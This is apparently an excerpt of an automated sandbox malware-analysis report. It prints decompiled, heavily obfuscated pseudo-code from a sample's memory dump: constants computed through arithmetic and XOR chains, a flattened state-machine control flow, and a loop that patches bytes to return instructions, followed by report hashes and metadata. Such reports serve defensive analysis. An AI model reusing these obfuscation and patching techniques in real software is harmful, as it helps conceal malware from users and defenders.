                                                                                                                                                                            				_v212 = 0x56f8ef;
                                                                                                                                                                            				_t525 = 0x74;
                                                                                                                                                                            				_v212 = _v212 / _t525;
                                                                                                                                                                            				_v212 = _v212 >> 1;
                                                                                                                                                                            				_v212 = _v212 ^ 0x00041781;
                                                                                                                                                                            				_v184 = 0x78f661;
                                                                                                                                                                            				_t526 = 0x24;
                                                                                                                                                                            				_v184 = _v184 / _t526;
                                                                                                                                                                            				_v184 = _v184 << 6;
                                                                                                                                                                            				_v184 = _v184 ^ 0x00d4b0ae;
                                                                                                                                                                            				_v132 = 0xfc57e1;
                                                                                                                                                                            				_v132 = _v132 + 0x95ac;
                                                                                                                                                                            				_v132 = _v132 ^ 0x00fd4e4f;
                                                                                                                                                                            				_v224 = 0x75249d;
                                                                                                                                                                            				_v224 = _v224 >> 2;
                                                                                                                                                                            				_v224 = _v224 << 5;
                                                                                                                                                                            				_v224 = _v224 ^ 0x03a0d1e2;
                                                                                                                                                                            				_v200 = 0x1dd68f;
                                                                                                                                                                            				_t527 = 0x1e;
                                                                                                                                                                            				_v200 = _v200 / _t527;
                                                                                                                                                                            				_v200 = _v200 << 5;
                                                                                                                                                                            				_v200 = _v200 ^ 0x001cc6a7;
                                                                                                                                                                            				_v192 = 0xfcdaf1;
                                                                                                                                                                            				_v192 = _v192 + 0xd795;
                                                                                                                                                                            				_v192 = _v192 >> 9;
                                                                                                                                                                            				_v192 = _v192 ^ 0x00058c90;
                                                                                                                                                                            				_v216 = 0xbb9259;
                                                                                                                                                                            				_t528 = 0x34;
                                                                                                                                                                            				_v216 = _v216 / _t528;
                                                                                                                                                                            				_t529 = 0x52;
                                                                                                                                                                            				_v216 = _v216 * 0x13;
                                                                                                                                                                            				_v216 = _v216 ^ 0x004a95ed;
                                                                                                                                                                            				_v276 = 0x57a41b;
                                                                                                                                                                            				_v276 = _v276 ^ 0xd020dbe5;
                                                                                                                                                                            				_v276 = _v276 | 0x8ab5e016;
                                                                                                                                                                            				_v276 = _v276 + 0xffff22d9;
                                                                                                                                                                            				_v276 = _v276 ^ 0xdaf55aee;
                                                                                                                                                                            				_v244 = 0x1f39e;
                                                                                                                                                                            				_v244 = _v244 >> 7;
                                                                                                                                                                            				_v244 = _v244 | 0x3f4cee99;
                                                                                                                                                                            				_v244 = _v244 / _t529;
                                                                                                                                                                            				_v244 = _v244 ^ 0x00c55e53;
                                                                                                                                                                            				_v208 = 0x8cb9ec;
                                                                                                                                                                            				_v208 = _v208 ^ 0x591dda69;
                                                                                                                                                                            				_v208 = _v208 + 0xffff44b3;
                                                                                                                                                                            				_v208 = _v208 ^ 0x5993fa0d;
                                                                                                                                                                            				_v152 = 0xb0343f;
                                                                                                                                                                            				_v152 = _v152 << 0xf;
                                                                                                                                                                            				_v152 = _v152 ^ 0x1a1cc008;
                                                                                                                                                                            				_v252 = 0xe1a21c;
                                                                                                                                                                            				_v252 = _v252 | 0x952b17c7;
                                                                                                                                                                            				_v252 = _v252 >> 0xb;
                                                                                                                                                                            				_v252 = _v252 + 0x3107;
                                                                                                                                                                            				_v252 = _v252 ^ 0x00168178;
                                                                                                                                                                            				_v176 = 0x1f45f4;
                                                                                                                                                                            				_v176 = _v176 + 0xffffb6c3;
                                                                                                                                                                            				_v176 = _v176 >> 3;
                                                                                                                                                                            				_v176 = _v176 ^ 0x000294fa;
                                                                                                                                                                            				_v144 = 0xd98b7;
                                                                                                                                                                            				_v144 = _v144 + 0xdfca;
                                                                                                                                                                            				_v144 = _v144 ^ 0x00064cf8;
                                                                                                                                                                            				_v124 = 0xf97c3c;
                                                                                                                                                                            				_v124 = _v124 << 0xe;
                                                                                                                                                                            				_v124 = _v124 ^ 0x5f01afd1;
                                                                                                                                                                            				_v220 = 0xbf67e3;
                                                                                                                                                                            				_v220 = _v220 >> 0xf;
                                                                                                                                                                            				_v220 = _v220 >> 8;
                                                                                                                                                                            				_v220 = _v220 ^ 0x0002d002;
                                                                                                                                                                            				_v148 = 0xfa1be7;
                                                                                                                                                                            				_v148 = _v148 * 0x4c;
                                                                                                                                                                            				_v148 = _v148 ^ 0x4a419838;
                                                                                                                                                                            				_v228 = 0xe7473d;
                                                                                                                                                                            				_v228 = _v228 + 0x3507;
                                                                                                                                                                            				_v228 = _v228 ^ 0x00ead38c;
                                                                                                                                                                            				_v156 = 0x66a8ab;
                                                                                                                                                                            				_v156 = _v156 | 0x79d54c9c;
                                                                                                                                                                            				_v156 = _v156 ^ 0x79fe3884;
                                                                                                                                                                            				_v240 = 0x18be1a;
                                                                                                                                                                            				_v240 = _v240 ^ 0x7e543587;
                                                                                                                                                                            				_v240 = _v240 * 0x68;
                                                                                                                                                                            				_v240 = _v240 | 0xe3fcfdd3;
                                                                                                                                                                            				_v240 = _v240 ^ 0xeff94d70;
                                                                                                                                                                            				_v172 = 0x9913c4;
                                                                                                                                                                            				_v172 = _v172 * 0x77;
                                                                                                                                                                            				_v172 = _v172 + 0xffffc63d;
                                                                                                                                                                            				_v172 = _v172 ^ 0x47206855;
                                                                                                                                                                            				_v248 = 0xd44183;
                                                                                                                                                                            				_v248 = _v248 + 0xd298;
                                                                                                                                                                            				_v248 = _v248 << 4;
                                                                                                                                                                            				_v248 = _v248 ^ 0x50766a5f;
                                                                                                                                                                            				_v248 = _v248 ^ 0x5d272bff;
                                                                                                                                                                            				_v256 = 0x31eb30;
                                                                                                                                                                            				_v256 = _v256 ^ 0xb25f58d4;
                                                                                                                                                                            				_v256 = _v256 ^ 0x46bb6998;
                                                                                                                                                                            				_t530 = 0x74;
                                                                                                                                                                            				_v256 = _v256 / _t530;
                                                                                                                                                                            				_v256 = _v256 ^ 0x021c5309;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t531 = _v120;
                                                                                                                                                                            					goto L2;
                                                                                                                                                                            					do {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L2:
                                                                                                                                                                            							_t543 = _t479 - 0x3286a26;
                                                                                                                                                                            							if(_t543 > 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t543 == 0) {
                                                                                                                                                                            								E02F72B09(_v220, _v116, _v148, _v228);
                                                                                                                                                                            								_t479 = 0x483cb7c;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t479 == 0xd18f0a) {
                                                                                                                                                                            								_t455 = E02F557B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
                                                                                                                                                                            								_t539 =  &(_t539[6]);
                                                                                                                                                                            								if(_t455 == 0) {
                                                                                                                                                                            									L33:
                                                                                                                                                                            									return _v108;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t479 = 0x98446cf;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t479 == 0x2686f46) {
                                                                                                                                                                            								_t534 =  *_t537;
                                                                                                                                                                            								E02F55026(_v184, _v132, _v224, _t534, _v200);
                                                                                                                                                                            								_t535 = _t534 + _v260;
                                                                                                                                                                            								E02F6C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
                                                                                                                                                                            								_push(_v152);
                                                                                                                                                                            								_t536 = _t535 + _v112;
                                                                                                                                                                            								_t492 = _t531;
                                                                                                                                                                            								_push(_v208);
                                                                                                                                                                            								_push(_t536);
                                                                                                                                                                            								E02F571B3(_t492, _v244);
                                                                                                                                                                            								_t532 =  &(_t536[_t531]);
                                                                                                                                                                            								_t541 =  &(_t539[0xa]);
                                                                                                                                                                            								_t519 = _t536;
                                                                                                                                                                            								if(_t536 >= _t532) {
                                                                                                                                                                            									L16:
                                                                                                                                                                            									_push(_t492);
                                                                                                                                                                            									_push(_t492);
                                                                                                                                                                            									_t464 = E02F6CCA0(0, 0xe);
                                                                                                                                                                            									_t539 =  &(_t541[4]);
                                                                                                                                                                            									_t479 = 0x3286a26;
                                                                                                                                                                            									 *((char*)(_t464 + _t536)) = 0;
                                                                                                                                                                            									_t533 = _v104;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L13;
                                                                                                                                                                            								}
                                                                                                                                                                            								do {
                                                                                                                                                                            									L13:
                                                                                                                                                                            									_t492 = _v268;
                                                                                                                                                                            									if(( *_t519 & 0x000000ff) == _t492) {
                                                                                                                                                                            										 *_t519 = 0xc3;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t519 =  &(_t519[1]);
                                                                                                                                                                            								} while (_t519 < _t532);
                                                                                                                                                                            								goto L16;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t479 == 0x2d8a01e) {
                                                                                                                                                                            								_t479 = 0xd18f0a;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t479 != 0x3056d50) {
                                                                                                                                                                            								goto L30;
                                                                                                                                                                            							}
                                                                                                                                                                            							_push(_t479);
                                                                                                                                                                            							_push(_t479);
                                                                                                                                                                            							_t469 = E02F5C5D8(_a4);
                                                                                                                                                                            							_t539 =  &(_t539[3]);
                                                                                                                                                                            							 *_t537 = _t469;
                                                                                                                                                                            							if(_t469 == 0) {
                                                                                                                                                                            								_t479 = 0x3286a26;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v108 = 1;
                                                                                                                                                                            								_t479 = 0x2686f46;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t479 == 0x34d1508) {
                                                                                                                                                                            							if(E02F5FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
                                                                                                                                                                            								_t479 = 0x483cb7c;
                                                                                                                                                                            								goto L30;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t479 = 0x5c08967;
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t479 == 0x483cb7c) {
                                                                                                                                                                            							E02F72B09(_v156, _v100, _v240, _v172);
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t479 == 0x5c08967) {
                                                                                                                                                                            							_push(_t479);
                                                                                                                                                                            							_push(_t479);
                                                                                                                                                                            							_t531 = E02F6CCA0(_v248, _v256);
                                                                                                                                                                            							_t539 =  &(_t539[4]);
                                                                                                                                                                            							_t479 = 0x3056d50;
                                                                                                                                                                            							_v120 = _t531;
                                                                                                                                                                            							_a4 = _v180 + _t531 + _v112;
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t479 != 0x98446cf) {
                                                                                                                                                                            							goto L30;
                                                                                                                                                                            						}
                                                                                                                                                                            						_v92 =  &_v32;
                                                                                                                                                                            						_v68 =  *_t477;
                                                                                                                                                                            						_v64 =  *((intOrPtr*)(_t477 + 4));
                                                                                                                                                                            						_v60 = _t533;
                                                                                                                                                                            						_v88 = 0x20;
                                                                                                                                                                            						_t475 = E02F5E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
                                                                                                                                                                            						_t539 =  &(_t539[3]);
                                                                                                                                                                            						if(_t475 == 0) {
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t479 = 0x34d1508;
                                                                                                                                                                            						goto L2;
                                                                                                                                                                            						L30:
                                                                                                                                                                            					} while (_t479 != 0x5241bf8);
                                                                                                                                                                            					goto L33;
                                                                                                                                                                            				}
                                                                                                                                                                            			}























































































                                                                                                                                                                            0x02f65780
                                                                                                                                                                            0x02f6578a
                                                                                                                                                                            0x02f6578b
                                                                                                                                                                            0x02f65792
                                                                                                                                                                            0x02f65794
                                                                                                                                                                            0x02f65796
                                                                                                                                                                            0x02f6579d
                                                                                                                                                                            0x02f657a4
                                                                                                                                                                            0x02f657a5
                                                                                                                                                                            0x02f657a6
                                                                                                                                                                            0x02f657ab
                                                                                                                                                                            0x02f657bf
                                                                                                                                                                            0x02f657c7
                                                                                                                                                                            0x02f657c8
                                                                                                                                                                            0x02f657cd
                                                                                                                                                                            0x02f657d2
                                                                                                                                                                            0x02f657d5
                                                                                                                                                                            0x02f657d6
                                                                                                                                                                            0x02f657de
                                                                                                                                                                            0x02f657e7
                                                                                                                                                                            0x02f657ec
                                                                                                                                                                            0x02f657f7
                                                                                                                                                                            0x02f657fb
                                                                                                                                                                            0x02f657ff
                                                                                                                                                                            0x02f6580a
                                                                                                                                                                            0x02f65815
                                                                                                                                                                            0x02f65820
                                                                                                                                                                            0x02f6582b
                                                                                                                                                                            0x02f65833
                                                                                                                                                                            0x02f6583b
                                                                                                                                                                            0x02f65843
                                                                                                                                                                            0x02f6584b
                                                                                                                                                                            0x02f65853
                                                                                                                                                                            0x02f6585b
                                                                                                                                                                            0x02f65864
                                                                                                                                                                            0x02f65867
                                                                                                                                                                            0x02f6586b
                                                                                                                                                                            0x02f65870
                                                                                                                                                                            0x02f65878
                                                                                                                                                                            0x02f6588b
                                                                                                                                                                            0x02f65892
                                                                                                                                                                            0x02f6589d
                                                                                                                                                                            0x02f658a8
                                                                                                                                                                            0x02f658b0
                                                                                                                                                                            0x02f658b7
                                                                                                                                                                            0x02f658c2
                                                                                                                                                                            0x02f658ca
                                                                                                                                                                            0x02f658d2
                                                                                                                                                                            0x02f658da
                                                                                                                                                                            0x02f658e2
                                                                                                                                                                            0x02f658ea
                                                                                                                                                                            0x02f658ef
                                                                                                                                                                            0x02f658f4
                                                                                                                                                                            0x02f658fc
                                                                                                                                                                            0x02f65904
                                                                                                                                                                            0x02f6590c
                                                                                                                                                                            0x02f65916
                                                                                                                                                                            0x02f6591a
                                                                                                                                                                            0x02f65922
                                                                                                                                                                            0x02f6592a
                                                                                                                                                                            0x02f65932
                                                                                                                                                                            0x02f6593a
                                                                                                                                                                            0x02f65942
                                                                                                                                                                            0x02f65955
                                                                                                                                                                            0x02f6595e
                                                                                                                                                                            0x02f65969
                                                                                                                                                                            0x02f65974
                                                                                                                                                                            0x02f6597f
                                                                                                                                                                            0x02f6598a
                                                                                                                                                                            0x02f65992
                                                                                                                                                                            0x02f6599a
                                                                                                                                                                            0x02f659a2
                                                                                                                                                                            0x02f659aa
                                                                                                                                                                            0x02f659b2
                                                                                                                                                                            0x02f659ba
                                                                                                                                                                            0x02f659c2
                                                                                                                                                                            0x02f659c7
                                                                                                                                                                            0x02f659cf
                                                                                                                                                                            0x02f659d7
                                                                                                                                                                            0x02f659df
                                                                                                                                                                            0x02f659e7
                                                                                                                                                                            0x02f659ef
                                                                                                                                                                            0x02f659f7
                                                                                                                                                                            0x02f659fc
                                                                                                                                                                            0x02f65a0a
                                                                                                                                                                            0x02f65a0f
                                                                                                                                                                            0x02f65a15
                                                                                                                                                                            0x02f65a1d
                                                                                                                                                                            0x02f65a25
                                                                                                                                                                            0x02f65a2a
                                                                                                                                                                            0x02f65a32
                                                                                                                                                                            0x02f65a3a
                                                                                                                                                                            0x02f65a42
                                                                                                                                                                            0x02f65a4d
                                                                                                                                                                            0x02f65a55
                                                                                                                                                                            0x02f65a60
                                                                                                                                                                            0x02f65a6b
                                                                                                                                                                            0x02f65a73
                                                                                                                                                                            0x02f65a7e
                                                                                                                                                                            0x02f65a8a
                                                                                                                                                                            0x02f65a8f
                                                                                                                                                                            0x02f65a95
                                                                                                                                                                            0x02f65a99
                                                                                                                                                                            0x02f65aa1
                                                                                                                                                                            0x02f65aad
                                                                                                                                                                            0x02f65ab2
                                                                                                                                                                            0x02f65ab8
                                                                                                                                                                            0x02f65abd
                                                                                                                                                                            0x02f65ac5
                                                                                                                                                                            0x02f65ad0
                                                                                                                                                                            0x02f65adb
                                                                                                                                                                            0x02f65ae6
                                                                                                                                                                            0x02f65aee
                                                                                                                                                                            0x02f65af3
                                                                                                                                                                            0x02f65af8
                                                                                                                                                                            0x02f65b00
                                                                                                                                                                            0x02f65b0c
                                                                                                                                                                            0x02f65b11
                                                                                                                                                                            0x02f65b15
                                                                                                                                                                            0x02f65b1a
                                                                                                                                                                            0x02f65b22
                                                                                                                                                                            0x02f65b2a
                                                                                                                                                                            0x02f65b32
                                                                                                                                                                            0x02f65b37
                                                                                                                                                                            0x02f65b41
                                                                                                                                                                            0x02f65b4d
                                                                                                                                                                            0x02f65b52
                                                                                                                                                                            0x02f65b5d
                                                                                                                                                                            0x02f65b60
                                                                                                                                                                            0x02f65b64
                                                                                                                                                                            0x02f65b6c
                                                                                                                                                                            0x02f65b74
                                                                                                                                                                            0x02f65b7c
                                                                                                                                                                            0x02f65b84
                                                                                                                                                                            0x02f65b8c
                                                                                                                                                                            0x02f65b94
                                                                                                                                                                            0x02f65b9c
                                                                                                                                                                            0x02f65ba1
                                                                                                                                                                            0x02f65baf
                                                                                                                                                                            0x02f65bb3
                                                                                                                                                                            0x02f65bbb
                                                                                                                                                                            0x02f65bc3
                                                                                                                                                                            0x02f65bcb
                                                                                                                                                                            0x02f65bd3
                                                                                                                                                                            0x02f65bdb
                                                                                                                                                                            0x02f65be6
                                                                                                                                                                            0x02f65bee
                                                                                                                                                                            0x02f65bf9
                                                                                                                                                                            0x02f65c01
                                                                                                                                                                            0x02f65c09
                                                                                                                                                                            0x02f65c0e
                                                                                                                                                                            0x02f65c16
                                                                                                                                                                            0x02f65c1e
                                                                                                                                                                            0x02f65c29
                                                                                                                                                                            0x02f65c34
                                                                                                                                                                            0x02f65c3c
                                                                                                                                                                            0x02f65c47
                                                                                                                                                                            0x02f65c52
                                                                                                                                                                            0x02f65c5d
                                                                                                                                                                            0x02f65c68
                                                                                                                                                                            0x02f65c73
                                                                                                                                                                            0x02f65c7b
                                                                                                                                                                            0x02f65c86
                                                                                                                                                                            0x02f65c8e
                                                                                                                                                                            0x02f65c93
                                                                                                                                                                            0x02f65c98
                                                                                                                                                                            0x02f65ca0
                                                                                                                                                                            0x02f65cb3
                                                                                                                                                                            0x02f65cba
                                                                                                                                                                            0x02f65cc5
                                                                                                                                                                            0x02f65ccd
                                                                                                                                                                            0x02f65cdd
                                                                                                                                                                            0x02f65ce5
                                                                                                                                                                            0x02f65cf0
                                                                                                                                                                            0x02f65cfb
                                                                                                                                                                            0x02f65d06
                                                                                                                                                                            0x02f65d0e
                                                                                                                                                                            0x02f65d1b
                                                                                                                                                                            0x02f65d1f
                                                                                                                                                                            0x02f65d27
                                                                                                                                                                            0x02f65d2f
                                                                                                                                                                            0x02f65d42
                                                                                                                                                                            0x02f65d49
                                                                                                                                                                            0x02f65d54
                                                                                                                                                                            0x02f65d5f
                                                                                                                                                                            0x02f65d67
                                                                                                                                                                            0x02f65d6f
                                                                                                                                                                            0x02f65d74
                                                                                                                                                                            0x02f65d7c
                                                                                                                                                                            0x02f65d84
                                                                                                                                                                            0x02f65d8c
                                                                                                                                                                            0x02f65d94
                                                                                                                                                                            0x02f65da2
                                                                                                                                                                            0x02f65da5
                                                                                                                                                                            0x02f65da9
                                                                                                                                                                            0x02f65db1
                                                                                                                                                                            0x02f65db1
                                                                                                                                                                            0x02f65db1
                                                                                                                                                                            0x02f65db1
                                                                                                                                                                            0x02f65db8
                                                                                                                                                                            0x02f65db8
                                                                                                                                                                            0x02f65db8
                                                                                                                                                                            0x02f65db8
                                                                                                                                                                            0x02f65dbe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65dc4
                                                                                                                                                                            0x02f65f56
                                                                                                                                                                            0x02f65f5d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65f5d
                                                                                                                                                                            0x02f65dd0
                                                                                                                                                                            0x02f65f26
                                                                                                                                                                            0x02f65f2b
                                                                                                                                                                            0x02f65f30
                                                                                                                                                                            0x02f660a6
                                                                                                                                                                            0x02f660b7
                                                                                                                                                                            0x02f660b7
                                                                                                                                                                            0x02f65f36
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65f36
                                                                                                                                                                            0x02f65ddc
                                                                                                                                                                            0x02f65e43
                                                                                                                                                                            0x02f65e59
                                                                                                                                                                            0x02f65e65
                                                                                                                                                                            0x02f65e86
                                                                                                                                                                            0x02f65e8b
                                                                                                                                                                            0x02f65e92
                                                                                                                                                                            0x02f65e99
                                                                                                                                                                            0x02f65e9b
                                                                                                                                                                            0x02f65ea3
                                                                                                                                                                            0x02f65ea4
                                                                                                                                                                            0x02f65ea9
                                                                                                                                                                            0x02f65eab
                                                                                                                                                                            0x02f65eae
                                                                                                                                                                            0x02f65eb2
                                                                                                                                                                            0x02f65ec7
                                                                                                                                                                            0x02f65ee0
                                                                                                                                                                            0x02f65ee1
                                                                                                                                                                            0x02f65ee6
                                                                                                                                                                            0x02f65eeb
                                                                                                                                                                            0x02f65eee
                                                                                                                                                                            0x02f65ef3
                                                                                                                                                                            0x02f65ef7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65eb4
                                                                                                                                                                            0x02f65eb4
                                                                                                                                                                            0x02f65eb4
                                                                                                                                                                            0x02f65ebd
                                                                                                                                                                            0x02f65ebf
                                                                                                                                                                            0x02f65ebf
                                                                                                                                                                            0x02f65ec2
                                                                                                                                                                            0x02f65ec3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65eb4
                                                                                                                                                                            0x02f65de4
                                                                                                                                                                            0x02f65e35
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65e35
                                                                                                                                                                            0x02f65dec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65e08
                                                                                                                                                                            0x02f65e09
                                                                                                                                                                            0x02f65e0d
                                                                                                                                                                            0x02f65e12
                                                                                                                                                                            0x02f65e15
                                                                                                                                                                            0x02f65e1a
                                                                                                                                                                            0x02f65e2e
                                                                                                                                                                            0x02f65e1c
                                                                                                                                                                            0x02f65e1c
                                                                                                                                                                            0x02f65e27
                                                                                                                                                                            0x02f65e27
                                                                                                                                                                            0x02f65e1a
                                                                                                                                                                            0x02f65f6d
                                                                                                                                                                            0x02f66067
                                                                                                                                                                            0x02f66073
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66073
                                                                                                                                                                            0x02f66069
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66069
                                                                                                                                                                            0x02f65f79
                                                                                                                                                                            0x02f6609f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f660a5
                                                                                                                                                                            0x02f65f85
                                                                                                                                                                            0x02f6600c
                                                                                                                                                                            0x02f6600d
                                                                                                                                                                            0x02f6601b
                                                                                                                                                                            0x02f6601d
                                                                                                                                                                            0x02f66024
                                                                                                                                                                            0x02f6602b
                                                                                                                                                                            0x02f66039
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66039
                                                                                                                                                                            0x02f65f8d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65fa6
                                                                                                                                                                            0x02f65faf
                                                                                                                                                                            0x02f65fb9
                                                                                                                                                                            0x02f65fcf
                                                                                                                                                                            0x02f65fd7
                                                                                                                                                                            0x02f65fe2
                                                                                                                                                                            0x02f65fe7
                                                                                                                                                                            0x02f65fec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65ff2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66078
                                                                                                                                                                            0x02f66078
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66084

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
                                                                                                                                                                            • API String ID: 0-1860247402
                                                                                                                                                                            • Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
                                                                                                                                                                            • Instruction ID: ace3709b4cd3dc7fcb05a211024de465789001d57f9ee49fe00ac81de9f612c8
                                                                                                                                                                            • Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
                                                                                                                                                                            • Instruction Fuzzy Hash: CC2243715083809FC768CF65C589A9BBBE2FFC5748F508A1DE6DA96260D7B08948CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F67D5B(void* __ecx) {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				char _v1560;
                                                                                                                                                                            				char _v2080;
                                                                                                                                                                            				char _v2600;
                                                                                                                                                                            				signed int _v2604;
                                                                                                                                                                            				signed int _v2608;
                                                                                                                                                                            				signed int _v2612;
                                                                                                                                                                            				signed int _v2616;
                                                                                                                                                                            				signed int _v2620;
                                                                                                                                                                            				signed int _v2624;
                                                                                                                                                                            				signed int _v2628;
                                                                                                                                                                            				signed int _v2632;
                                                                                                                                                                            				signed int _v2636;
                                                                                                                                                                            				signed int _v2640;
                                                                                                                                                                            				signed int _v2644;
                                                                                                                                                                            				signed int _v2648;
                                                                                                                                                                            				signed int _v2652;
                                                                                                                                                                            				signed int _v2656;
                                                                                                                                                                            				signed int _v2660;
                                                                                                                                                                            				signed int _v2664;
                                                                                                                                                                            				signed int _v2668;
                                                                                                                                                                            				signed int _v2672;
                                                                                                                                                                            				signed int _v2676;
                                                                                                                                                                            				signed int _v2680;
                                                                                                                                                                            				signed int _v2684;
                                                                                                                                                                            				signed int _v2688;
                                                                                                                                                                            				signed int _v2692;
                                                                                                                                                                            				signed int _v2696;
                                                                                                                                                                            				signed int _v2700;
                                                                                                                                                                            				signed int _v2704;
                                                                                                                                                                            				signed int _v2708;
                                                                                                                                                                            				signed int _v2712;
                                                                                                                                                                            				signed int _v2716;
                                                                                                                                                                            				signed int _v2720;
                                                                                                                                                                            				signed int _v2724;
                                                                                                                                                                            				signed int _v2728;
                                                                                                                                                                            				signed int _v2732;
                                                                                                                                                                            				signed int _v2736;
                                                                                                                                                                            				signed int _v2740;
                                                                                                                                                                            				signed int _v2744;
                                                                                                                                                                            				signed int _v2748;
                                                                                                                                                                            				signed int _v2752;
                                                                                                                                                                            				signed int _v2756;
                                                                                                                                                                            				signed int _v2760;
                                                                                                                                                                            				signed int _v2764;
                                                                                                                                                                            				signed int _v2768;
                                                                                                                                                                            				signed int _v2772;
                                                                                                                                                                            				signed int _v2776;
                                                                                                                                                                            				signed int _v2780;
                                                                                                                                                                            				signed int _v2784;
                                                                                                                                                                            				signed int _v2788;
                                                                                                                                                                            				signed int _v2792;
                                                                                                                                                                            				signed int _t420;
                                                                                                                                                                            				signed int _t442;
                                                                                                                                                                            				signed int _t443;
                                                                                                                                                                            				signed int _t444;
                                                                                                                                                                            				signed int _t445;
                                                                                                                                                                            				signed int _t446;
                                                                                                                                                                            				signed int _t447;
                                                                                                                                                                            				signed int _t448;
                                                                                                                                                                            				void* _t488;
                                                                                                                                                                            				void* _t489;
                                                                                                                                                                            				signed int* _t493;
                                                                                                                                                                            
                                                                                                                                                                            				_t493 =  &_v2792;
                                                                                                                                                                            				_v2792 = 0x289571;
                                                                                                                                                                            				_v2792 = _v2792 | 0xf6df9bca;
                                                                                                                                                                            				_v2792 = _v2792 + 0xea43;
                                                                                                                                                                            				_v2792 = _v2792 ^ 0xf7008a17;
                                                                                                                                                                            				_v2788 = 0xdb8a78;
                                                                                                                                                                            				_v2788 = _v2788 * 6;
                                                                                                                                                                            				_t488 = __ecx;
                                                                                                                                                                            				_t489 = 0x219adc7;
                                                                                                                                                                            				_t442 = 0x7a;
                                                                                                                                                                            				_v2788 = _v2788 / _t442;
                                                                                                                                                                            				_t443 = 0x42;
                                                                                                                                                                            				_v2788 = _v2788 * 0x3d;
                                                                                                                                                                            				_v2788 = _v2788 ^ 0x0296dfb6;
                                                                                                                                                                            				_v2660 = 0xc0a6c5;
                                                                                                                                                                            				_v2660 = _v2660 << 6;
                                                                                                                                                                            				_v2660 = _v2660 ^ 0x3025665c;
                                                                                                                                                                            				_v2692 = 0x3a8fa3;
                                                                                                                                                                            				_v2692 = _v2692 ^ 0xa120b079;
                                                                                                                                                                            				_v2692 = _v2692 | 0x9ac88514;
                                                                                                                                                                            				_v2692 = _v2692 ^ 0xbbd9167d;
                                                                                                                                                                            				_v2668 = 0xec1a87;
                                                                                                                                                                            				_v2668 = _v2668 + 0x8cab;
                                                                                                                                                                            				_v2668 = _v2668 ^ 0x00e348c2;
                                                                                                                                                                            				_v2628 = 0xecd9a9;
                                                                                                                                                                            				_v2628 = _v2628 << 9;
                                                                                                                                                                            				_v2628 = _v2628 ^ 0xd9bcc0eb;
                                                                                                                                                                            				_v2756 = 0xbae8da;
                                                                                                                                                                            				_v2756 = _v2756 + 0xefc;
                                                                                                                                                                            				_v2756 = _v2756 * 0x2c;
                                                                                                                                                                            				_v2756 = _v2756 ^ 0x76eb1803;
                                                                                                                                                                            				_v2756 = _v2756 ^ 0x56c3d905;
                                                                                                                                                                            				_v2780 = 0x787147;
                                                                                                                                                                            				_v2780 = _v2780 + 0xffff6597;
